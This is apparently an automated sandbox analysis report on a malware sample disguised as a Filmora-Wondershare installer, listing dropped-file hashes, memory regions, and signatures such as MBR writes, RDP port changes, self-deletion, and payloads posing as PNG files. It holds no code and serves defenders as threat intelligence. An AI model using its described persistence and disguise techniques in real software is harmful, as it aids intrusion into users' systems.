memory/920-91-0x000007FEE8BC0000-0x000007FEE9C56000-memory.dmp
memory/1788-92-0x0000000000000000-mapping.dmp
memory/1788-93-0x000007FEFB561000-0x000007FEFB563000-memory.dmp
memory/1788-94-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
memory/1788-95-0x000000001AD30000-0x000000001AD31000-memory.dmp
memory/1788-96-0x0000000002000000-0x0000000002001000-memory.dmp
memory/1788-97-0x000000001ACB0000-0x000000001ACB2000-memory.dmp
memory/1788-98-0x000000001ACB4000-0x000000001ACB6000-memory.dmp
memory/1788-99-0x0000000002030000-0x0000000002031000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/1788-101-0x000000001C2A0000-0x000000001C2A1000-memory.dmp
memory/2008-102-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\tnk0n035\tnk0n035.cmdline
| MD5 | e6953629454271a191db380fb38a919d |
| SHA1 | ab643f95d8f3faf87c681baa0a4749bf16ab2d38 |
| SHA256 | cb7a97cb41335de4d32d4a2db727a42c524d80a4540129bad0b2b0b2242adfe4 |
| SHA512 | 7fdedd84f0d741d4f654e787bad1b492c971e702504fa90cacf99f18904f59ec35600239580e8c66c0d3269c34ce75e5d603eff51bd1f01c97da8b32b507c22d |
\??\c:\Users\Admin\AppData\Local\Temp\tnk0n035\tnk0n035.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/1196-105-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\tnk0n035\CSC9E160A0322BD483483B2C3D605862D6.TMP
| MD5 | e0d2570cbc3a1dfa9b2209dbf810afab |
| SHA1 | e6b71a68efb83d8a32d1ddef15bd8e8626c51207 |
| SHA256 | 017f084284f98e8caf0cea819706ef685789e336ea3239c8cdeee0b7cf0c6f8f |
| SHA512 | 87bba166b94a501461dd531f3220db55dd346b1b8a4bb61f58b6457c22a875ce9c7c823d1c6f1ffaf9336155d7dffd7b33037ff355844f0d2684f8cf9f9eac4d |
C:\Users\Admin\AppData\Local\Temp\RES6162.tmp
| MD5 | da8dd5c5202829a0cc1669aa8801aa14 |
| SHA1 | bad924baf33bbaf9447a565a91178bcec822f9d0 |
| SHA256 | 0faf6abc9400fc28efdeeaacf00514ee7c7f1218df10e2160a6ebf2cad30095e |
| SHA512 | 0d1ea43e834dccdf8568a180690f9657243642f12953b5f5a1f14638a2f318207aaa053eba5072d3a98ea221167b3aff560174a6ed0501426599a0b5f3ab35e5 |
C:\Users\Admin\AppData\Local\Temp\tnk0n035\tnk0n035.dll
| MD5 | f8ac1b3e62d085530c79fea31735146f |
| SHA1 | 2096d2a480a602b02ff37ed4990d4a38b46e9898 |
| SHA256 | 753bf8376076ffd1f89bb68037cdb0e4b6882f915634ad32dee2f5ac76427a7b |
| SHA512 | 6dfe5a434af74e939ddfe9064cf29186656f94d987c30a16783488a1b1580694050147f39fe7652d31582d9ec9c64b467553a7555edd78f6b80fea99efedbe83 |
memory/1788-109-0x00000000024B0000-0x00000000024B1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1788-111-0x000000001AC20000-0x000000001AC21000-memory.dmp
memory/1788-112-0x000000001B6E0000-0x000000001B6E1000-memory.dmp
memory/1788-113-0x0000000002910000-0x0000000002911000-memory.dmp
memory/1680-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 41fa7976063a154e2b448408b2a014c8 |
| SHA1 | 85b9d0b53aaeda6e133ed002957d43351c138b50 |
| SHA256 | 285b93d920c57bab61da0bb5dd240a00795b28e5d3257837341ece0a7fe42d0b |
| SHA512 | 53212ebaedb504875a70e006634d399e4a1f81e92008737aecce04b502be42cdb5db814b47d34f9d8e299157d5fadde54a04c9492392c3f31bd8921347a03a2a |
memory/1680-121-0x000000001ABD4000-0x000000001ABD6000-memory.dmp
memory/1680-120-0x000000001ABD0000-0x000000001ABD2000-memory.dmp
memory/1680-122-0x0000000002580000-0x0000000002581000-memory.dmp
memory/1680-124-0x000000001AB30000-0x000000001AB31000-memory.dmp
memory/1680-126-0x000000001B500000-0x000000001B501000-memory.dmp
memory/1680-127-0x0000000002450000-0x0000000002451000-memory.dmp
memory/1788-128-0x000000001ACBA000-0x000000001ACD9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | bd0880000b7f0d4caf7ac27e42f5e2dc |
| SHA1 | 22ebc801ab484bc52f330476800016b7ed331ac2 |
| SHA256 | 7389f9d8a53c34739b6cb20d99abe31edf43146d7e547a7c4c8d81fb382123dc |
| SHA512 | f2bd764e6b5c0c5c22986cc4297fde3167bb069c22d6009cd6e92a2544f3c1bcd9fb63ed3a645b754208318cae1e29c04c3d2759db939e5ff766debcc652b2d4 |
memory/1680-133-0x000000001B8B0000-0x000000001B8B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_662e467f-d0e0-445a-8230-5c2bdd31dabb
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
memory/1680-146-0x000000001B630000-0x000000001B631000-memory.dmp
memory/1680-147-0x000000001B6C0000-0x000000001B6C1000-memory.dmp
memory/1608-148-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 41fa7976063a154e2b448408b2a014c8 |
| SHA1 | 85b9d0b53aaeda6e133ed002957d43351c138b50 |
| SHA256 | 285b93d920c57bab61da0bb5dd240a00795b28e5d3257837341ece0a7fe42d0b |
| SHA512 | 53212ebaedb504875a70e006634d399e4a1f81e92008737aecce04b502be42cdb5db814b47d34f9d8e299157d5fadde54a04c9492392c3f31bd8921347a03a2a |
memory/1608-154-0x000000001ABC0000-0x000000001ABC2000-memory.dmp
memory/1608-155-0x000000001ABC4000-0x000000001ABC6000-memory.dmp
memory/1608-156-0x0000000002480000-0x0000000002481000-memory.dmp
memory/1608-158-0x000000001B590000-0x000000001B591000-memory.dmp
memory/1608-160-0x000000001B7F0000-0x000000001B7F1000-memory.dmp
memory/1608-161-0x0000000001F70000-0x0000000001F71000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 20f7985346c6e87cdfd11e44f24405a8 |
| SHA1 | 5b293ee06a50ffaf2b4c51ef3f7f421a2150bac1 |
| SHA256 | 8e59c2e00f76ad287d9f79662d870e2faeb4659ef8bd2b6dcf778e0d5fd72d2b |
| SHA512 | 47973b0e61a95f1a07331c155aafb998d21a1a7fe46958190268c4053f7d13d1f90e931b5e0443b70824aea387194a10b04ff8155f374935255ea48b5bcf2eaa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ad7ad33e-f7c0-433c-bd7a-adb3a181261e
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_97698212-1bf6-42e8-b03c-62794cbda03e
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8944ab66-c5aa-4f2b-8a79-924dce3ed7ea
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcdccd0a-6542-49a6-a7e8-6e556e8e0652
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f4389b9e-2346-4804-8e0d-d50e264f3ad6
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b07d4ce7-c3df-4004-8573-c930431c7dc8
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
memory/1096-169-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 41fa7976063a154e2b448408b2a014c8 |
| SHA1 | 85b9d0b53aaeda6e133ed002957d43351c138b50 |
| SHA256 | 285b93d920c57bab61da0bb5dd240a00795b28e5d3257837341ece0a7fe42d0b |
| SHA512 | 53212ebaedb504875a70e006634d399e4a1f81e92008737aecce04b502be42cdb5db814b47d34f9d8e299157d5fadde54a04c9492392c3f31bd8921347a03a2a |
memory/1096-175-0x000000001AC20000-0x000000001AC22000-memory.dmp
memory/1096-176-0x000000001AC24000-0x000000001AC26000-memory.dmp
memory/1404-184-0x0000000000000000-mapping.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
memory/300-186-0x0000000000000000-mapping.dmp
memory/1680-187-0x0000000000000000-mapping.dmp
memory/520-188-0x0000000000000000-mapping.dmp
memory/920-189-0x0000000000000000-mapping.dmp
memory/980-190-0x0000000000000000-mapping.dmp
memory/1992-191-0x0000000000000000-mapping.dmp
memory/1200-192-0x0000000000000000-mapping.dmp
memory/988-193-0x0000000000000000-mapping.dmp
memory/1500-194-0x0000000000000000-mapping.dmp
memory/1904-195-0x0000000000000000-mapping.dmp
memory/1056-196-0x0000000000000000-mapping.dmp
memory/884-197-0x0000000000000000-mapping.dmp
memory/1596-198-0x0000000000000000-mapping.dmp
memory/964-199-0x0000000000000000-mapping.dmp
memory/520-200-0x0000000000000000-mapping.dmp
memory/1208-201-0x0000000000000000-mapping.dmp
memory/2008-202-0x0000000000000000-mapping.dmp
memory/1784-203-0x0000000000000000-mapping.dmp
memory/1992-204-0x0000000000000000-mapping.dmp
memory/816-205-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/920-208-0x0000000000000000-mapping.dmp
memory/1984-209-0x0000000000000000-mapping.dmp
memory/1576-210-0x0000000000000000-mapping.dmp
memory/1844-211-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1904-213-0x0000000000000000-mapping.dmp
memory/520-214-0x0000000000000000-mapping.dmp
memory/1700-215-0x0000000000000000-mapping.dmp
memory/1640-216-0x0000000000000000-mapping.dmp
memory/884-217-0x0000000000000000-mapping.dmp
memory/1576-218-0x0000000000000000-mapping.dmp
memory/1296-219-0x0000000000000000-mapping.dmp
memory/1904-220-0x0000000000000000-mapping.dmp
memory/884-221-0x0000000000000000-mapping.dmp
memory/964-222-0x0000000000000000-mapping.dmp
memory/552-223-0x0000000000000000-mapping.dmp
memory/992-224-0x0000000000000000-mapping.dmp
memory/992-230-0x0000000019430000-0x0000000019432000-memory.dmp
memory/992-231-0x0000000019434000-0x0000000019436000-memory.dmp
memory/992-260-0x000000001943A000-0x0000000019459000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Setup.zip
| MD5 | 36f178576dcb8db35d6f06448b1eb510 |
| SHA1 | 62277c90cc2b1bb81b36571037afe5081b0605d5 |
| SHA256 | 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a |
| SHA512 | 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96 |
memory/2304-262-0x0000000000000000-mapping.dmp
memory/2316-263-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-07-21 08:36
Reported
2021-07-21 08:38
Platform
win10v20210410
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe1.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\Wondershare\NFWCHK.exe | N/A |
Modifies RDP port number used by Windows
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6EAF.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kb1ue3tv.ivt.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_uvddbqio.rzs.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6EFF.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6ECF.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6E8E.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6F0F.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
